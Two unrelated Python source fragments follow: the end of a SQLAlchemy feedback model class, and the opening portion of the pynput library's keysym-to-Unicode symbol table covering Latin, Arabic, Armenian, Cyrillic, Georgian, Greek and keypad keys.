id = Column(db.Integer, primary_key=True, index=True)
user_id = Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
date_sent = Column(db.DateTime, nullable=True, default=dt.datetime.utcnow)
typeform_key = Column(db.String(50), nullable=False)
inspection_id = Column(db.Integer, db.ForeignKey('inspection.id'), nullable=False)
def __repr__(self):
d = self.date_sent
return '<Feedback({})>'.format(
"sent on: " + d.strftime(REPR_DATE_FMT) if d else "unsent")
|
# coding: utf-8
# pynput
# Copyright (C) 2015-2017 Moses Palmér
#
# This program is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# pylint: disable=C0111,C0302
SYMBOLS = {
'0': (0x0030, u'\u0030'),
'1': (0x0031, u'\u0031'),
'2': (0x0032, u'\u0032'),
'3': (0x0033, u'\u0033'),
'4': (0x0034, u'\u0034'),
'5': (0x0035, u'\u0035'),
'6': (0x0036, u'\u0036'),
'7': (0x0037, u'\u0037'),
'8': (0x0038, u'\u0038'),
'9': (0x0039, u'\u0039'),
'A': (0x0041, u'\u0041'),
'AE': (0x00c6, u'\u00C6'),
'Aacute': (0x00c1, u'\u00C1'),
'Abelowdot': (0x1001ea0, u'\u1EA0'),
'Abreve': (0x01c3, u'\u0102'),
'Abreveacute': (0x1001eae, u'\u1EAE'),
'Abrevebelowdot': (0x1001eb6, u'\u1EB6'),
'Abrevegrave': (0x1001eb0, u'\u1EB0'),
'Abrevehook': (0x1001eb2, u'\u1EB2'),
'Abrevetilde': (0x1001eb4, u'\u1EB4'),
'Acircumflex': (0x00c2, u'\u00C2'),
'Acircumflexacute': (0x1001ea4, u'\u1EA4'),
'Acircumflexbelowdot': (0x1001eac, u'\u1EAC'),
'Acircumflexgrave': (0x1001ea6, u'\u1EA6'),
'Acircumflexhook': (0x1001ea8, u'\u1EA8'),
'Acircumflextilde': (0x1001eaa, u'\u1EAA'),
'Adiaeresis': (0x00c4, u'\u00C4'),
'Agrave': (0x00c0, u'\u00C0'),
'Ahook': (0x1001ea2, u'\u1EA2'),
'Amacron': (0x03c0, u'\u0100'),
'Aogonek': (0x01a1, u'\u0104'),
'Arabic_0': (0x1000660, u'\u0660'),
'Arabic_1': (0x1000661, u'\u0661'),
'Arabic_2': (0x1000662, u'\u0662'),
'Arabic_3': (0x1000663, u'\u0663'),
'Arabic_4': (0x1000664, u'\u0664'),
'Arabic_5': (0x1000665, u'\u0665'),
'Arabic_6': (0x1000666, u'\u0666'),
'Arabic_7': (0x1000667, u'\u0667'),
'Arabic_8': (0x1000668, u'\u0668'),
'Arabic_9': (0x1000669, u'\u0669'),
'Arabic_ain': (0x05d9, u'\u0639'),
'Arabic_alef': (0x05c7, u'\u0627'),
'Arabic_alefmaksura': (0x05e9, u'\u0649'),
'Arabic_beh': (0x05c8, u'\u0628'),
'Arabic_comma': (0x05ac, u'\u060C'),
'Arabic_dad': (0x05d6, u'\u0636'),
'Arabic_dal': (0x05cf, u'\u062F'),
'Arabic_damma': (0x05ef, u'\u064F'),
'Arabic_dammatan': (0x05ec, u'\u064C'),
'Arabic_ddal': (0x1000688, u'\u0688'),
'Arabic_farsi_yeh': (0x10006cc, u'\u06CC'),
'Arabic_fatha': (0x05ee, u'\u064E'),
'Arabic_fathatan': (0x05eb, u'\u064B'),
'Arabic_feh': (0x05e1, u'\u0641'),
'Arabic_fullstop': (0x10006d4, u'\u06D4'),
'Arabic_gaf': (0x10006af, u'\u06AF'),
'Arabic_ghain': (0x05da, u'\u063A'),
'Arabic_ha': (0x05e7, u'\u0647'),
'Arabic_hah': (0x05cd, u'\u062D'),
'Arabic_hamza': (0x05c1, u'\u0621'),
'Arabic_hamza_above': (0x1000654, u'\u0654'),
'Arabic_hamza_below': (0x1000655, u'\u0655'),
'Arabic_hamzaonalef': (0x05c3, u'\u0623'),
'Arabic_hamzaonwaw': (0x05c4, u'\u0624'),
'Arabic_hamzaonyeh': (0x05c6, u'\u0626'),
'Arabic_hamzaunderalef': (0x05c5, u'\u0625'),
'Arabic_heh_doachashmee': (0x10006be, u'\u06BE'),
'Arabic_heh_goal': (0x10006c1, u'\u06C1'),
'Arabic_jeem': (0x05cc, u'\u062C'),
'Arabic_jeh': (0x1000698, u'\u0698'),
'Arabic_kaf': (0x05e3, u'\u0643'),
'Arabic_kasra': (0x05f0, u'\u0650'),
'Arabic_kasratan': (0x05ed, u'\u064D'),
'Arabic_keheh': (0x10006a9, u'\u06A9'),
'Arabic_khah': (0x05ce, u'\u062E'),
'Arabic_lam': (0x05e4, u'\u0644'),
'Arabic_madda_above': (0x1000653, u'\u0653'),
'Arabic_maddaonalef': (0x05c2, u'\u0622'),
'Arabic_meem': (0x05e5, u'\u0645'),
'Arabic_noon': (0x05e6, u'\u0646'),
'Arabic_noon_ghunna': (0x10006ba, u'\u06BA'),
'Arabic_peh': (0x100067e, u'\u067E'),
'Arabic_percent': (0x100066a, u'\u066A'),
'Arabic_qaf': (0x05e2, u'\u0642'),
'Arabic_question_mark': (0x05bf, u'\u061F'),
'Arabic_ra': (0x05d1, u'\u0631'),
'Arabic_rreh': (0x1000691, u'\u0691'),
'Arabic_sad': (0x05d5, u'\u0635'),
'Arabic_seen': (0x05d3, u'\u0633'),
'Arabic_semicolon': (0x05bb, u'\u061B'),
'Arabic_shadda': (0x05f1, u'\u0651'),
'Arabic_sheen': (0x05d4, u'\u0634'),
'Arabic_sukun': (0x05f2, u'\u0652'),
'Arabic_superscript_alef': (0x1000670, u'\u0670'),
'Arabic_tah': (0x05d7, u'\u0637'),
'Arabic_tatweel': (0x05e0, u'\u0640'),
'Arabic_tcheh': (0x1000686, u'\u0686'),
'Arabic_teh': (0x05ca, u'\u062A'),
'Arabic_tehmarbuta': (0x05c9, u'\u0629'),
'Arabic_thal': (0x05d0, u'\u0630'),
'Arabic_theh': (0x05cb, u'\u062B'),
'Arabic_tteh': (0x1000679, u'\u0679'),
'Arabic_veh': (0x10006a4, u'\u06A4'),
'Arabic_waw': (0x05e8, u'\u0648'),
'Arabic_yeh': (0x05ea, u'\u064A'),
'Arabic_yeh_baree': (0x10006d2, u'\u06D2'),
'Arabic_zah': (0x05d8, u'\u0638'),
'Arabic_zain': (0x05d2, u'\u0632'),
'Aring': (0x00c5, u'\u00C5'),
'Armenian_AT': (0x1000538, u'\u0538'),
'Armenian_AYB': (0x1000531, u'\u0531'),
'Armenian_BEN': (0x1000532, u'\u0532'),
'Armenian_CHA': (0x1000549, u'\u0549'),
'Armenian_DA': (0x1000534, u'\u0534'),
'Armenian_DZA': (0x1000541, u'\u0541'),
'Armenian_E': (0x1000537, u'\u0537'),
'Armenian_FE': (0x1000556, u'\u0556'),
'Armenian_GHAT': (0x1000542, u'\u0542'),
'Armenian_GIM': (0x1000533, u'\u0533'),
'Armenian_HI': (0x1000545, u'\u0545'),
'Armenian_HO': (0x1000540, u'\u0540'),
'Armenian_INI': (0x100053b, u'\u053B'),
'Armenian_JE': (0x100054b, u'\u054B'),
'Armenian_KE': (0x1000554, u'\u0554'),
'Armenian_KEN': (0x100053f, u'\u053F'),
'Armenian_KHE': (0x100053d, u'\u053D'),
'Armenian_LYUN': (0x100053c, u'\u053C'),
'Armenian_MEN': (0x1000544, u'\u0544'),
'Armenian_NU': (0x1000546, u'\u0546'),
'Armenian_O': (0x1000555, u'\u0555'),
'Armenian_PE': (0x100054a, u'\u054A'),
'Armenian_PYUR': (0x1000553, u'\u0553'),
'Armenian_RA': (0x100054c, u'\u054C'),
'Armenian_RE': (0x1000550, u'\u0550'),
'Armenian_SE': (0x100054d, u'\u054D'),
'Armenian_SHA': (0x1000547, u'\u0547'),
'Armenian_TCHE': (0x1000543, u'\u0543'),
'Armenian_TO': (0x1000539, u'\u0539'),
'Armenian_TSA': (0x100053e, u'\u053E'),
'Armenian_TSO': (0x1000551, u'\u0551'),
'Armenian_TYUN': (0x100054f, u'\u054F'),
'Armenian_VEV': (0x100054e, u'\u054E'),
'Armenian_VO': (0x1000548, u'\u0548'),
'Armenian_VYUN': (0x1000552, u'\u0552'),
'Armenian_YECH': (0x1000535, u'\u0535'),
'Armenian_ZA': (0x1000536, u'\u0536'),
'Armenian_ZHE': (0x100053a, u'\u053A'),
'Armenian_accent': (0x100055b, u'\u055B'),
'Armenian_amanak': (0x100055c, u'\u055C'),
'Armenian_apostrophe': (0x100055a, u'\u055A'),
'Armenian_at': (0x1000568, u'\u0568'),
'Armenian_ayb': (0x1000561, u'\u0561'),
'Armenian_ben': (0x1000562, u'\u0562'),
'Armenian_but': (0x100055d, u'\u055D'),
'Armenian_cha': (0x1000579, u'\u0579'),
'Armenian_da': (0x1000564, u'\u0564'),
'Armenian_dza': (0x1000571, u'\u0571'),
'Armenian_e': (0x1000567, u'\u0567'),
'Armenian_exclam': (0x100055c, u'\u055C'),
'Armenian_fe': (0x1000586, u'\u0586'),
'Armenian_full_stop': (0x1000589, u'\u0589'),
'Armenian_ghat': (0x1000572, u'\u0572'),
'Armenian_gim': (0x1000563, u'\u0563'),
'Armenian_hi': (0x1000575, u'\u0575'),
'Armenian_ho': (0x1000570, u'\u0570'),
'Armenian_hyphen': (0x100058a, u'\u058A'),
'Armenian_ini': (0x100056b, u'\u056B'),
'Armenian_je': (0x100057b, u'\u057B'),
'Armenian_ke': (0x1000584, u'\u0584'),
'Armenian_ken': (0x100056f, u'\u056F'),
'Armenian_khe': (0x100056d, u'\u056D'),
'Armenian_ligature_ew': (0x1000587, u'\u0587'),
'Armenian_lyun': (0x100056c, u'\u056C'),
'Armenian_men': (0x1000574, u'\u0574'),
'Armenian_nu': (0x1000576, u'\u0576'),
'Armenian_o': (0x1000585, u'\u0585'),
'Armenian_paruyk': (0x100055e, u'\u055E'),
'Armenian_pe': (0x100057a, u'\u057A'),
'Armenian_pyur': (0x1000583, u'\u0583'),
'Armenian_question': (0x100055e, u'\u055E'),
'Armenian_ra': (0x100057c, u'\u057C'),
'Armenian_re': (0x1000580, u'\u0580'),
'Armenian_se': (0x100057d, u'\u057D'),
'Armenian_separation_mark': (0x100055d, u'\u055D'),
'Armenian_sha': (0x1000577, u'\u0577'),
'Armenian_shesht': (0x100055b, u'\u055B'),
'Armenian_tche': (0x1000573, u'\u0573'),
'Armenian_to': (0x1000569, u'\u0569'),
'Armenian_tsa': (0x100056e, u'\u056E'),
'Armenian_tso': (0x1000581, u'\u0581'),
'Armenian_tyun': (0x100057f, u'\u057F'),
'Armenian_verjaket': (0x1000589, u'\u0589'),
'Armenian_vev': (0x100057e, u'\u057E'),
'Armenian_vo': (0x1000578, u'\u0578'),
'Armenian_vyun': (0x1000582, u'\u0582'),
'Armenian_yech': (0x1000565, u'\u0565'),
'Armenian_yentamna': (0x100058a, u'\u058A'),
'Armenian_za': (0x1000566, u'\u0566'),
'Armenian_zhe': (0x100056a, u'\u056A'),
'Atilde': (0x00c3, u'\u00C3'),
'B': (0x0042, u'\u0042'),
'Babovedot': (0x1001e02, u'\u1E02'),
'Byelorussian_SHORTU': (0x06be, u'\u040E'),
'Byelorussian_shortu': (0x06ae, u'\u045E'),
'C': (0x0043, u'\u0043'),
'Cabovedot': (0x02c5, u'\u010A'),
'Cacute': (0x01c6, u'\u0106'),
'Ccaron': (0x01c8, u'\u010C'),
'Ccedilla': (0x00c7, u'\u00C7'),
'Ccircumflex': (0x02c6, u'\u0108'),
'ColonSign': (0x10020a1, u'\u20A1'),
'CruzeiroSign': (0x10020a2, u'\u20A2'),
'Cyrillic_A': (0x06e1, u'\u0410'),
'Cyrillic_BE': (0x06e2, u'\u0411'),
'Cyrillic_CHE': (0x06fe, u'\u0427'),
'Cyrillic_CHE_descender': (0x10004b6, u'\u04B6'),
'Cyrillic_CHE_vertstroke': (0x10004b8, u'\u04B8'),
'Cyrillic_DE': (0x06e4, u'\u0414'),
'Cyrillic_DZHE': (0x06bf, u'\u040F'),
'Cyrillic_E': (0x06fc, u'\u042D'),
'Cyrillic_EF': (0x06e6, u'\u0424'),
'Cyrillic_EL': (0x06ec, u'\u041B'),
'Cyrillic_EM': (0x06ed, u'\u041C'),
'Cyrillic_EN': (0x06ee, u'\u041D'),
'Cyrillic_EN_descender': (0x10004a2, u'\u04A2'),
'Cyrillic_ER': (0x06f2, u'\u0420'),
'Cyrillic_ES': (0x06f3, u'\u0421'),
'Cyrillic_GHE': (0x06e7, u'\u0413'),
'Cyrillic_GHE_bar': (0x1000492, u'\u0492'),
'Cyrillic_HA': (0x06e8, u'\u0425'),
'Cyrillic_HARDSIGN': (0x06ff, u'\u042A'),
'Cyrillic_HA_descender': (0x10004b2, u'\u04B2'),
'Cyrillic_I': (0x06e9, u'\u0418'),
'Cyrillic_IE': (0x06e5, u'\u0415'),
'Cyrillic_IO': (0x06b3, u'\u0401'),
'Cyrillic_I_macron': (0x10004e2, u'\u04E2'),
'Cyrillic_JE': (0x06b8, u'\u0408'),
'Cyrillic_KA': (0x06eb, u'\u041A'),
'Cyrillic_KA_descender': (0x100049a, u'\u049A'),
'Cyrillic_KA_vertstroke': (0x100049c, u'\u049C'),
'Cyrillic_LJE': (0x06b9, u'\u0409'),
'Cyrillic_NJE': (0x06ba, u'\u040A'),
'Cyrillic_O': (0x06ef, u'\u041E'),
'Cyrillic_O_bar': (0x10004e8, u'\u04E8'),
'Cyrillic_PE': (0x06f0, u'\u041F'),
'Cyrillic_SCHWA': (0x10004d8, u'\u04D8'),
'Cyrillic_SHA': (0x06fb, u'\u0428'),
'Cyrillic_SHCHA': (0x06fd, u'\u0429'),
'Cyrillic_SHHA': (0x10004ba, u'\u04BA'),
'Cyrillic_SHORTI': (0x06ea, u'\u0419'),
'Cyrillic_SOFTSIGN': (0x06f8, u'\u042C'),
'Cyrillic_TE': (0x06f4, u'\u0422'),
'Cyrillic_TSE': (0x06e3, u'\u0426'),
'Cyrillic_U': (0x06f5, u'\u0423'),
'Cyrillic_U_macron': (0x10004ee, u'\u04EE'),
'Cyrillic_U_straight': (0x10004ae, u'\u04AE'),
'Cyrillic_U_straight_bar': (0x10004b0, u'\u04B0'),
'Cyrillic_VE': (0x06f7, u'\u0412'),
'Cyrillic_YA': (0x06f1, u'\u042F'),
'Cyrillic_YERU': (0x06f9, u'\u042B'),
'Cyrillic_YU': (0x06e0, u'\u042E'),
'Cyrillic_ZE': (0x06fa, u'\u0417'),
'Cyrillic_ZHE': (0x06f6, u'\u0416'),
'Cyrillic_ZHE_descender': (0x1000496, u'\u0496'),
'Cyrillic_a': (0x06c1, u'\u0430'),
'Cyrillic_be': (0x06c2, u'\u0431'),
'Cyrillic_che': (0x06de, u'\u0447'),
'Cyrillic_che_descender': (0x10004b7, u'\u04B7'),
'Cyrillic_che_vertstroke': (0x10004b9, u'\u04B9'),
'Cyrillic_de': (0x06c4, u'\u0434'),
'Cyrillic_dzhe': (0x06af, u'\u045F'),
'Cyrillic_e': (0x06dc, u'\u044D'),
'Cyrillic_ef': (0x06c6, u'\u0444'),
'Cyrillic_el': (0x06cc, u'\u043B'),
'Cyrillic_em': (0x06cd, u'\u043C'),
'Cyrillic_en': (0x06ce, u'\u043D'),
'Cyrillic_en_descender': (0x10004a3, u'\u04A3'),
'Cyrillic_er': (0x06d2, u'\u0440'),
'Cyrillic_es': (0x06d3, u'\u0441'),
'Cyrillic_ghe': (0x06c7, u'\u0433'),
'Cyrillic_ghe_bar': (0x1000493, u'\u0493'),
'Cyrillic_ha': (0x06c8, u'\u0445'),
'Cyrillic_ha_descender': (0x10004b3, u'\u04B3'),
'Cyrillic_hardsign': (0x06df, u'\u044A'),
'Cyrillic_i': (0x06c9, u'\u0438'),
'Cyrillic_i_macron': (0x10004e3, u'\u04E3'),
'Cyrillic_ie': (0x06c5, u'\u0435'),
'Cyrillic_io': (0x06a3, u'\u0451'),
'Cyrillic_je': (0x06a8, u'\u0458'),
'Cyrillic_ka': (0x06cb, u'\u043A'),
'Cyrillic_ka_descender': (0x100049b, u'\u049B'),
'Cyrillic_ka_vertstroke': (0x100049d, u'\u049D'),
'Cyrillic_lje': (0x06a9, u'\u0459'),
'Cyrillic_nje': (0x06aa, u'\u045A'),
'Cyrillic_o': (0x06cf, u'\u043E'),
'Cyrillic_o_bar': (0x10004e9, u'\u04E9'),
'Cyrillic_pe': (0x06d0, u'\u043F'),
'Cyrillic_schwa': (0x10004d9, u'\u04D9'),
'Cyrillic_sha': (0x06db, u'\u0448'),
'Cyrillic_shcha': (0x06dd, u'\u0449'),
'Cyrillic_shha': (0x10004bb, u'\u04BB'),
'Cyrillic_shorti': (0x06ca, u'\u0439'),
'Cyrillic_softsign': (0x06d8, u'\u044C'),
'Cyrillic_te': (0x06d4, u'\u0442'),
'Cyrillic_tse': (0x06c3, u'\u0446'),
'Cyrillic_u': (0x06d5, u'\u0443'),
'Cyrillic_u_macron': (0x10004ef, u'\u04EF'),
'Cyrillic_u_straight': (0x10004af, u'\u04AF'),
'Cyrillic_u_straight_bar': (0x10004b1, u'\u04B1'),
'Cyrillic_ve': (0x06d7, u'\u0432'),
'Cyrillic_ya': (0x06d1, u'\u044F'),
'Cyrillic_yeru': (0x06d9, u'\u044B'),
'Cyrillic_yu': (0x06c0, u'\u044E'),
'Cyrillic_ze': (0x06da, u'\u0437'),
'Cyrillic_zhe': (0x06d6, u'\u0436'),
'Cyrillic_zhe_descender': (0x1000497, u'\u0497'),
'D': (0x0044, u'\u0044'),
'Dabovedot': (0x1001e0a, u'\u1E0A'),
'Dcaron': (0x01cf, u'\u010E'),
'DongSign': (0x10020ab, u'\u20AB'),
'Dstroke': (0x01d0, u'\u0110'),
'E': (0x0045, u'\u0045'),
'ENG': (0x03bd, u'\u014A'),
'ETH': (0x00d0, u'\u00D0'),
'EZH': (0x10001b7, u'\u01B7'),
'Eabovedot': (0x03cc, u'\u0116'),
'Eacute': (0x00c9, u'\u00C9'),
'Ebelowdot': (0x1001eb8, u'\u1EB8'),
'Ecaron': (0x01cc, u'\u011A'),
'Ecircumflex': (0x00ca, u'\u00CA'),
'Ecircumflexacute': (0x1001ebe, u'\u1EBE'),
'Ecircumflexbelowdot': (0x1001ec6, u'\u1EC6'),
'Ecircumflexgrave': (0x1001ec0, u'\u1EC0'),
'Ecircumflexhook': (0x1001ec2, u'\u1EC2'),
'Ecircumflextilde': (0x1001ec4, u'\u1EC4'),
'EcuSign': (0x10020a0, u'\u20A0'),
'Ediaeresis': (0x00cb, u'\u00CB'),
'Egrave': (0x00c8, u'\u00C8'),
'Ehook': (0x1001eba, u'\u1EBA'),
'Emacron': (0x03aa, u'\u0112'),
'Eogonek': (0x01ca, u'\u0118'),
'Etilde': (0x1001ebc, u'\u1EBC'),
'EuroSign': (0x20ac, u'\u20AC'),
'F': (0x0046, u'\u0046'),
'FFrancSign': (0x10020a3, u'\u20A3'),
'Fabovedot': (0x1001e1e, u'\u1E1E'),
'Farsi_0': (0x10006f0, u'\u06F0'),
'Farsi_1': (0x10006f1, u'\u06F1'),
'Farsi_2': (0x10006f2, u'\u06F2'),
'Farsi_3': (0x10006f3, u'\u06F3'),
'Farsi_4': (0x10006f4, u'\u06F4'),
'Farsi_5': (0x10006f5, u'\u06F5'),
'Farsi_6': (0x10006f6, u'\u06F6'),
'Farsi_7': (0x10006f7, u'\u06F7'),
'Farsi_8': (0x10006f8, u'\u06F8'),
'Farsi_9': (0x10006f9, u'\u06F9'),
'Farsi_yeh': (0x10006cc, u'\u06CC'),
'G': (0x0047, u'\u0047'),
'Gabovedot': (0x02d5, u'\u0120'),
'Gbreve': (0x02ab, u'\u011E'),
'Gcaron': (0x10001e6, u'\u01E6'),
'Gcedilla': (0x03ab, u'\u0122'),
'Gcircumflex': (0x02d8, u'\u011C'),
'Georgian_an': (0x10010d0, u'\u10D0'),
'Georgian_ban': (0x10010d1, u'\u10D1'),
'Georgian_can': (0x10010ea, u'\u10EA'),
'Georgian_char': (0x10010ed, u'\u10ED'),
'Georgian_chin': (0x10010e9, u'\u10E9'),
'Georgian_cil': (0x10010ec, u'\u10EC'),
'Georgian_don': (0x10010d3, u'\u10D3'),
'Georgian_en': (0x10010d4, u'\u10D4'),
'Georgian_fi': (0x10010f6, u'\u10F6'),
'Georgian_gan': (0x10010d2, u'\u10D2'),
'Georgian_ghan': (0x10010e6, u'\u10E6'),
'Georgian_hae': (0x10010f0, u'\u10F0'),
'Georgian_har': (0x10010f4, u'\u10F4'),
'Georgian_he': (0x10010f1, u'\u10F1'),
'Georgian_hie': (0x10010f2, u'\u10F2'),
'Georgian_hoe': (0x10010f5, u'\u10F5'),
'Georgian_in': (0x10010d8, u'\u10D8'),
'Georgian_jhan': (0x10010ef, u'\u10EF'),
'Georgian_jil': (0x10010eb, u'\u10EB'),
'Georgian_kan': (0x10010d9, u'\u10D9'),
'Georgian_khar': (0x10010e5, u'\u10E5'),
'Georgian_las': (0x10010da, u'\u10DA'),
'Georgian_man': (0x10010db, u'\u10DB'),
'Georgian_nar': (0x10010dc, u'\u10DC'),
'Georgian_on': (0x10010dd, u'\u10DD'),
'Georgian_par': (0x10010de, u'\u10DE'),
'Georgian_phar': (0x10010e4, u'\u10E4'),
'Georgian_qar': (0x10010e7, u'\u10E7'),
'Georgian_rae': (0x10010e0, u'\u10E0'),
'Georgian_san': (0x10010e1, u'\u10E1'),
'Georgian_shin': (0x10010e8, u'\u10E8'),
'Georgian_tan': (0x10010d7, u'\u10D7'),
'Georgian_tar': (0x10010e2, u'\u10E2'),
'Georgian_un': (0x10010e3, u'\u10E3'),
'Georgian_vin': (0x10010d5, u'\u10D5'),
'Georgian_we': (0x10010f3, u'\u10F3'),
'Georgian_xan': (0x10010ee, u'\u10EE'),
'Georgian_zen': (0x10010d6, u'\u10D6'),
'Georgian_zhar': (0x10010df, u'\u10DF'),
'Greek_ALPHA': (0x07c1, u'\u0391'),
'Greek_ALPHAaccent': (0x07a1, u'\u0386'),
'Greek_BETA': (0x07c2, u'\u0392'),
'Greek_CHI': (0x07d7, u'\u03A7'),
'Greek_DELTA': (0x07c4, u'\u0394'),
'Greek_EPSILON': (0x07c5, u'\u0395'),
'Greek_EPSILONaccent': (0x07a2, u'\u0388'),
'Greek_ETA': (0x07c7, u'\u0397'),
'Greek_ETAaccent': (0x07a3, u'\u0389'),
'Greek_GAMMA': (0x07c3, u'\u0393'),
'Greek_IOTA': (0x07c9, u'\u0399'),
'Greek_IOTAaccent': (0x07a4, u'\u038A'),
'Greek_IOTAdieresis': (0x07a5, u'\u03AA'),
'Greek_KAPPA': (0x07ca, u'\u039A'),
'Greek_LAMBDA': (0x07cb, u'\u039B'),
'Greek_LAMDA': (0x07cb, u'\u039B'),
'Greek_MU': (0x07cc, u'\u039C'),
'Greek_NU': (0x07cd, u'\u039D'),
'Greek_OMEGA': (0x07d9, u'\u03A9'),
'Greek_OMEGAaccent': (0x07ab, u'\u038F'),
'Greek_OMICRON': (0x07cf, u'\u039F'),
'Greek_OMICRONaccent': (0x07a7, u'\u038C'),
'Greek_PHI': (0x07d6, u'\u03A6'),
'Greek_PI': (0x07d0, u'\u03A0'),
'Greek_PSI': (0x07d8, u'\u03A8'),
'Greek_RHO': (0x07d1, u'\u03A1'),
'Greek_SIGMA': (0x07d2, u'\u03A3'),
'Greek_TAU': (0x07d4, u'\u03A4'),
'Greek_THETA': (0x07c8, u'\u0398'),
'Greek_UPSILON': (0x07d5, u'\u03A5'),
'Greek_UPSILONaccent': (0x07a8, u'\u038E'),
'Greek_UPSILONdieresis': (0x07a9, u'\u03AB'),
'Greek_XI': (0x07ce, u'\u039E'),
'Greek_ZETA': (0x07c6, u'\u0396'),
'Greek_accentdieresis': (0x07ae, u'\u0385'),
'Greek_alpha': (0x07e1, u'\u03B1'),
'Greek_alphaaccent': (0x07b1, u'\u03AC'),
'Greek_beta': (0x07e2, u'\u03B2'),
'Greek_chi': (0x07f7, u'\u03C7'),
'Greek_delta': (0x07e4, u'\u03B4'),
'Greek_epsilon': (0x07e5, u'\u03B5'),
'Greek_epsilonaccent': (0x07b2, u'\u03AD'),
'Greek_eta': (0x07e7, u'\u03B7'),
'Greek_etaaccent': (0x07b3, u'\u03AE'),
'Greek_finalsmallsigma': (0x07f3, u'\u03C2'),
'Greek_gamma': (0x07e3, u'\u03B3'),
'Greek_horizbar': (0x07af, u'\u2015'),
'Greek_iota': (0x07e9, u'\u03B9'),
'Greek_iotaaccent': (0x07b4, u'\u03AF'),
'Greek_iotaaccentdieresis': (0x07b6, u'\u0390'),
'Greek_iotadieresis': (0x07b5, u'\u03CA'),
'Greek_kappa': (0x07ea, u'\u03BA'),
'Greek_lambda': (0x07eb, u'\u03BB'),
'Greek_lamda': (0x07eb, u'\u03BB'),
'Greek_mu': (0x07ec, u'\u03BC'),
'Greek_nu': (0x07ed, u'\u03BD'),
'Greek_omega': (0x07f9, u'\u03C9'),
'Greek_omegaaccent': (0x07bb, u'\u03CE'),
'Greek_omicron': (0x07ef, u'\u03BF'),
'Greek_omicronaccent': (0x07b7, u'\u03CC'),
'Greek_phi': (0x07f6, u'\u03C6'),
'Greek_pi': (0x07f0, u'\u03C0'),
'Greek_psi': (0x07f8, u'\u03C8'),
'Greek_rho': (0x07f1, u'\u03C1'),
'Greek_sigma': (0x07f2, u'\u03C3'),
'Greek_tau': (0x07f4, u'\u03C4'),
'Greek_theta': (0x07e8, u'\u03B8'),
'Greek_upsilon': (0x07f5, u'\u03C5'),
'Greek_upsilonaccent': (0x07b8, u'\u03CD'),
'Greek_upsilonaccentdieresis': (0x07ba, u'\u03B0'),
'Greek_upsilondieresis': (0x07b9, u'\u03CB'),
'Greek_xi': (0x07ee, u'\u03BE'),
'Greek_zeta': (0x07e6, u'\u03B6'),
'H': (0x0048, u'\u0048'),
'Hcircumflex': (0x02a6, u'\u0124'),
'Hstroke': (0x02a1, u'\u0126'),
'I': (0x0049, u'\u0049'),
'Iabovedot': (0x02a9, u'\u0130'),
'Iacute': (0x00cd, u'\u00CD'),
'Ibelowdot': (0x1001eca, u'\u1ECA'),
'Ibreve': (0x100012c, u'\u012C'),
'Icircumflex': (0x00ce, u'\u00CE'),
'Idiaeresis': (0x00cf, u'\u00CF'),
'Igrave': (0x00cc, u'\u00CC'),
'Ihook': (0x1001ec8, u'\u1EC8'),
'Imacron': (0x03cf, u'\u012A'),
'Iogonek': (0x03c7, u'\u012E'),
'Itilde': (0x03a5, u'\u0128'),
'J': (0x004a, u'\u004A'),
'Jcircumflex': (0x02ac, u'\u0134'),
'K': (0x004b, u'\u004B'),
'KP_0': (0xffb0, None),
'KP_1': (0xffb1, None),
'KP_2': (0xffb2, None),
'KP_3': (0xffb3, None),
'KP_4': (0xffb4, None),
'KP_5': (0xffb5, None),
'KP_6': (0xffb6, None),
'KP_7': (0xffb7, None),
'KP_8': (0xffb8, None),
'KP_9': (0xffb9, None),
'KP_Add': (0xffab, None),
'KP_Begin': (0xff9d, None),
'KP_Decimal': (0xffae, None),
'KP_Delete': (0xff9f, None),
'KP_Divide': (0xffaf, None),
'KP_Down': (0xff99, None),
'KP_End': (0xff9c, None),
'KP_Enter': (0xff8d, None),
'KP_Equal': (0xffbd, None),
'KP_F1': (0xff91, None),
'KP_F2': (0xff92, None),
'KP_F3': (0xff93, None),
'KP_F4': (0xff94, None),
'KP_Home': (0xff95, None),
'KP_Insert': (0xff9e, None),
'KP_Left': (0xff96, None),
'KP_Multiply': (0xffaa, None),
'KP_Next': (0xff9b, None),
'KP_Page_Down': (0xff9b, None),
'KP_Page_Up': (0xff9a, None),
'KP_Prior': (0xff9a, None),
'KP_Right': (0xff98, None),
'KP_Separator': (0xffac, None),
'KP_Space': (0xff80, None),
'KP_Subtract': (0xffad, None),
'KP_Tab': (0xff89, None),
'KP_Up': (0xff97, None),
'Kcedilla': (0x03d3, u'\u0136'),
'L': (0x004c, u'\u004C'),
'Lacute': (0x01c5, u'\u0139'),
'Lbelowdot': (0x1001e36, u'\u1E36'),
'Lcaron': (0x01a5, u'\u013D'),
'Lcedilla': (0x03a6, u'\u013B'),
'LiraSign': (0x10020a4, u'\u20A4'),
'Lstroke': (0x01a3, u'\u0141'),
'M': (0x004d, u'\u004D'),
'Mabovedot': (0x1001e40, u'\u1E40'),
'Macedonia_DSE': (0x06b5, u'\u0405'),
'Macedonia_GJE': (0x06b2, u'\u0403'),
'Macedonia_KJE': (0x06bc, u'\u040C'),
'Macedonia_dse': (0x06a5, u'\u0455'),
'Macedonia_gje': (0x06a2, u'\u0453'),
'Macedonia_kje': (0x06ac, u'\u045C'),
'MillSign': (0x10020a5, u'\u20A5'),
'N': (0x004e, u'\u004E'),
'Nacute': (0x01d1, u'\u0143'),
'NairaSign': (0x10020a6, u'\u20A6'),
'Ncaron': (0x01d2, u'\u0147'),
'Ncedilla': (0x03d1, u'\u0145'),
'NewSheqelSign': (0x10020aa, u'\u20AA'),
'Ntilde': (0x00d1, u'\u00D1'),
'O': (0x004f, u'\u004F'),
'OE': (0x13bc, u'\u0152'),
'Oacute': (0x00d3, u'\u00D3'),
'Obarred': (0x100019f, u'\u019F'),
'Obelowdot': (0x1001ecc, u'\u1ECC'),
'Ocaron': (0x10001d1, u'\u01D2'),
'Ocircumflex': (0x00d4, u'\u00D4'),
'Ocircumflexacute': (0x1001ed0, u'\u1ED0'),
'Ocircumflexbelowdot': (0x1001ed8, u'\u1ED8'),
'Ocircumflexgrave': (0x1001ed2, u'\u1ED2'),
'Ocircumflexhook': (0x1001ed4, u'\u1ED4'),
